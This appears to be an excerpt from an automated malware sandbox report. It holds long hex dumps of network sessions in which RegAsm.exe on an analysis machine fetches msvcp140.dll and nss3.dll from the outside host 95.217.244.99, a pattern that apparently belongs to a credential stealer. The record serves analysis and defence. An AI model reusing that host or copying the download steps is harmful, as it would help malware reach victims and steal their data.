                                                                                                                                                                                                                                      2024-04-23 19:44:13 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                                                                                                                                                                                                      Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                                                                                                                                                                                                      2024-04-23 19:44:13 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                                                                                                                                                                                                      Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                                                                                                                                                                                                      2024-04-23 19:44:13 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                                                                                                                                                                                                      Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                                                                                                                                                                                                      2024-04-23 19:44:13 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                                                                                                                                                                                                      Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                                                                                                                                                                                                      2024-04-23 19:44:13 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                                                                                                                                                                                                      Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      12192.168.2.64972195.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:14 UTC158OUTGET /msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:14 UTC246INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:14 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 450024
                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "6315a9f4-6dde8"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      2024-04-23 19:44:14 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                                                                                                                                                                                                      2024-04-23 19:44:14 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                                                                                                                                                                                                      Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                                                                                                                                                                                                      2024-04-23 19:44:15 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                                                                                                                                                                                                      Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
                                                                                                                                                                                                                                      2024-04-23 19:44:15 UTC16384INData Raw: c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 fc dd e2 df e0 dd da f6 c4 44 7b 49 d9 c2 d8 c1
                                                                                                                                                                                                                                      Data Ascii: E]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u|_E^UQQMuU]EDB]ED{nt]B]ED{I
                                                                                                                                                                                                                                      2024-04-23 19:44:15 UTC16384INData Raw: f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b 83 c0 02 83 6d d4 01 75 ec 8b c2 85 c0 74 26 3b
                                                                                                                                                                                                                                      Data Ascii: f;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90utmut&;
                                                                                                                                                                                                                                      2024-04-23 19:44:15 UTC16384INData Raw: cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc 53 57 8b f9 83 7f 4c 00 75 04 33 db eb 24 56 e8
                                                                                                                                                                                                                                      Data Ascii: UjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jjSWLu3$V
                                                                                                                                                                                                                                      2024-04-23 19:44:15 UTC16384INData Raw: 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 51 e8 20 94 ff ff 83 7d fc 10 59 0f be 4d 14 89
                                                                                                                                                                                                                                      Data Ascii: r@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WENQ }YM
                                                                                                                                                                                                                                      2024-04-23 19:44:15 UTC16384INData Raw: 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 73 03 02 00 03 c3 89 04 f7 83 d2 00 8b da 89 5c
                                                                                                                                                                                                                                      Data Ascii: MS3R|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4s\
                                                                                                                                                                                                                                      2024-04-23 19:44:15 UTC16384INData Raw: 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c 69 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10
                                                                                                                                                                                                                                      Data Ascii: uF|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv|iqY(R
                                                                                                                                                                                                                                      2024-04-23 19:44:15 UTC16384INData Raw: 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 ee 01 74 11 83 7d ec 10 8d 45 d8 72 03 8b 45 d8
                                                                                                                                                                                                                                      Data Ascii: u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tWt}ErE


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      13192.168.2.64972395.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:16 UTC154OUTGET /nss3.dll HTTP/1.1
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:17 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:16 GMT
                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                      Content-Length: 2046288
                                                                                                                                                                                                                                      Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      ETag: "6315a9f4-1f3950"
                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                      2024-04-23 19:44:17 UTC16136INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                                                                                                                                                                                      Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                                                                                                                                                                                      2024-04-23 19:44:17 UTC16384INData Raw: 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51 fe ff ff c7 41 14 0b 00 00 00 8b 51 18
                                                                                                                                                                                                                                      Data Ascii: i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQAQ
                                                                                                                                                                                                                                      2024-04-23 19:44:17 UTC16384INData Raw: 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b 80 a0 00 00 00 83 e0 0c 83 f8 08 0f 85
                                                                                                                                                                                                                                      Data Ascii: ti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                                                                                                                                                                                      2024-04-23 19:44:17 UTC16384INData Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff
                                                                                                                                                                                                                                      Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
